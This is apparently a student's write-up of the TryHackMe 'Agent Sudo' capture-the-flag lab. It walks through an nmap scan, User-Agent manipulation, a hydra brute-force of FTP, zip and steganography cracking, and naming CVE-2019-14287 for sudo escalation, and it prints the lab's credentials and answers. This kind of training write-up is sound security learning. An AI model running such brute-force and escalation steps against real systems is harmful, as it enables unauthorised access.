[THM] Agent Sudo

You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.

Link to the room

Overview

This room consists of a web page which is protected, to access useful information, you have to modify the user agent within the requests to the web server. After this, you get a user and an indication that your password is weak, this will allow you to crack the password and access the ftp server with the credentials obtained.

Inside this server there is a .zip file which can be cracked and it turns out that there is a password inside. This process is repeated with the different files found until you find some user credentials user:passwthat allows to ssh the machine.

To escalate privileges, the version of sudo is studied, which presents the vulnerability CVE-2019-14287.

[Task 2] Enumerate

$ nmap -sC -sV -T4 10.10.73.250
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 19:13 CEST
Nmap scan report for 10.10.73.250
Host is up (0.076s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_ 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.78 seconds

#1 How many open ports?

3

#2 How you redirect yourself to a secret page?

user-agent

#3 What is the agent name?

I have done a web directory scan but I have not found anything, also the ftp port and the ssh port

I admit that I have had to look at the clue that the web page gives, so I have verified that if I change the user agent of the request made to the http server to the letter “C”, I receive in the response a “location” with a php file:

GET / HTTP/1.1
Host: 10.10.73.250
User-Agent: C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

response received:

HTTP/1.1 302 Found
Date: Tue, 04 Aug 2020 17:28:50 GMT
Server: Apache/2.4.29 (Ubuntu)
Location: agent_C_attention.php # !!!!!!!
Content-Length: 218
Connection: close
Content-Type: text/html; charset=UTF-8


<!DocType html>
<html>
<head>
<title>Annoucement</title>
</head>

<body>
<p>
Dear agents,
<br><br>
Use your own <b>codename</b> as user-agent to access the site.
<br><br>
From,<br>
Agent R
</p>
</body>
</html>

now i just go to the file from my browser

Attention chris,

Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!

From,
Agent R

PD: chris password is weak :) i can brute-force it probably.

chris

[Task 3] Hash cracking and brute-force

#1 FTP password

$ hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.73.250 ftp
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-04 19:35:45
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.10.73.250:21/
[STATUS] 232.00 tries/min, 232 tries in 00:01h, 14344167 to do in 1030:29h, 16 active
[21][ftp] host: 10.10.73.250 login: chris password: crystal
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-04 19:37:04
crystal

#2 Zip file password

I do a bit of research and I see that agent J’s password is in an image, i found a simple script to crack the pass from the zip in the image:

alien

#3 steg password

i find “QXJlYTUx” inside To_agentR.txt file, i put it in CyberChef and i get Area51

Area51

#4 Who is the other agent (in full name)?

with the new password I will try to extract something from the other image:

$ steghide extract -sf cute-alien.jpg
Enter passphrase:
wrote extracted data to "message.txt".
$ cat message.txt
Hi james,

Glad you find this message. Your login password is hackerrules!

Don't ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,
chris
james

#5 SSH password

hackerrules!

[Task 4] Capture user flag

#1 What is the user flag?

********************************

#2 What is the incident of the photo called?

Roswell alien autopsy

[Task 5] Privilege escalation

#1 CVE number for the escalation

i use linpeas.sh to get some info, nothing useful, i search for sudo version and find some privilege escalation vuln!

CVE-2019-14287

Computer Science student. Capture the flag player.